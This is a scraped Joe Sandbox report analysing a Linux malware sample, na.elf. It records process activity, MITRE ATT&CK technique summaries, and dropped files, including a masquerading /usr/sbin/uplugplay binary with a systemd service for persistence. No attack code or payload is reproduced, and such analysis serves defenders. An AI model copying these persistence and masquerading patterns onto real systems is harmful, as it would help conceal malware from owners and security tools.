Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 5699, Parent PID: 5698

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 5702, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5702, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5703, Parent PID: 5702

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 5703, Parent PID: 5702

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: systemd PID: 5555, Parent PID: 1

General

Start time (UTC):	09:38:19
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemd-hostnamed PID: 5555, Parent PID: 1

General

Start time (UTC):	09:38:19
Start date (UTC):	31/03/2025
Path:	/lib/systemd/systemd-hostnamed
Arguments:	/lib/systemd/systemd-hostnamed
File size:	35040 bytes
MD5 hash:	2cc8a5576629a2d5bd98e49a4b8bef65

File Activities

File Opened

File Read

Process Activities

Prctl Requested

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: dash PID: 5779, Parent PID: 3636

General

Start time (UTC):	09:39:37
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5779, Parent PID: 3636

General

Start time (UTC):	09:39:37
Start date (UTC):	31/03/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.qGJ3bwLjXY /tmp/tmp.1CaqzfB7yS /tmp/tmp.LOsFLDTnx1
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Chronological Activities

Analysis Process: dash PID: 5780, Parent PID: 3636

General

Start time (UTC):	09:39:37
Start date (UTC):	31/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5780, Parent PID: 3636

General

Start time (UTC):	09:39:37
Start date (UTC):	31/03/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.qGJ3bwLjXY /tmp/tmp.1CaqzfB7yS /tmp/tmp.LOsFLDTnx1
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/CommId

/memfd:snapd-env-generator (deleted)

/usr/lib/systemd/system/uplugplay.service

/usr/sbin/uplugplay

/var/lib/fwupd/gnupg/.#lk0x000055e17e839b80.galassia.5501

/var/lib/fwupd/gnupg/.#lk0x0000560caad68b80.galassia.5522

/var/lib/fwupd/gnupg/.#lk0x00005628bd044b80.galassia.5503

/var/lib/fwupd/gnupg/.#lk0x00005630efaf2b80.galassia.5509

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: na.elf PID: 5454, Parent PID: 5381

General

File Activities

Linux Analysis Report
na.elf